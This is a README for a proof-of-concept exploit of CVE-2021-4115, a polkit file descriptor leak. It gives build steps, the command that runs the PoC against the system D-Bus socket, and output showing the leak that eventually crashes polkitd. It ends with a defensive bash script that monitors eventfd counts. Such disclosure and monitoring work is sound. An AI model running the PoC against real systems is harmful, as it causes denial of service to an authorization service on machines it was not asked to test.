This repository contains a proof-of-concept exploit for CVE-2021-4115: file descriptor exhaustion in polkit.

Instructions for building the PoC:
git submodule update --init   # Download https://github.com/kevinbackhouse/DBusParse
mkdir build
cd build
cmake ..
make

The PoC causes polkit to leak eventfd file descriptors. After several runs of the PoC, polkit will have leaked so many file descriptors that it crashes when it exceeds its file descriptor limit.
First, check how many file descriptors polkit has open:
$ sudo ls -l /proc/`pidof polkitd`/fd | wc
12 123 680

Now run the PoC:

./locksessions /var/run/dbus/system_bus_socket 0x4000

(The PoC is named locksessions because it calls the org.freedesktop.login1.Manager.LockSessions D-Bus method.)
Now check again how many file descriptors polkit has open:
$ sudo ls -l /proc/`pidof polkitd`/fd | wc
255 2796 16872
Notice that a large number of eventfd file descriptors have been leaked. After a few more runs of the PoC, polkit will most likely crash.
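As an added monitoring example (not part of this repository), the following bash functions walk a /proc/<pid>/fd directory and report how many of the open descriptors are eventfds, since a climbing eventfd count is the observable symptom of this leak; the directory argument and the alert threshold are assumptions, not values from the PoC.

```shell
#!/bin/bash
# Count the open file descriptors in a /proc/<pid>/fd directory and how many
# of them are eventfd handles. In /proc, each fd entry is a symlink whose
# target is e.g. "socket:[1234]", "/dev/null" or "anon_inode:[eventfd]".
# Prints "<total> <eventfd_count>".
count_fds() {
  local fddir="$1" total=0 eventfd=0 fd target
  for fd in "$fddir"/*; do
    # Skip the unexpanded glob when the directory is empty; keep dangling
    # symlinks (-L), which is what anon_inode targets look like to [ -e ].
    [ -e "$fd" ] || [ -L "$fd" ] || continue
    total=$((total + 1))
    target=$(readlink "$fd" 2>/dev/null)
    case "$target" in
      'anon_inode:[eventfd]') eventfd=$((eventfd + 1)) ;;
    esac
  done
  echo "$total $eventfd"
}

# Return 0 while the eventfd count stays below the threshold, 1 once it is
# reached. The default threshold of 100 is an assumed value; tune it to the
# baseline observed on the host (a healthy polkitd holds only a handful).
check_polkit_fds() {
  local fddir="$1" threshold="${2:-100}"
  set -- $(count_fds "$fddir")
  if [ "$2" -ge "$threshold" ]; then
    echo "ALERT: $2 of $1 descriptors in $fddir are eventfds (threshold $threshold)"
    return 1
  fi
  echo "OK: $2 of $1 descriptors in $fddir are eventfds"
  return 0
}

# Intended invocation on a live system (needs root to read polkitd's fd table):
#   sudo bash -c "$(declare -f count_fds check_polkit_fds); check_polkit_fds /proc/\$(pidof polkitd)/fd"
```

Run it from cron or a monitoring agent; a non-zero exit is the signal to restart polkitd and investigate who is driving the leak.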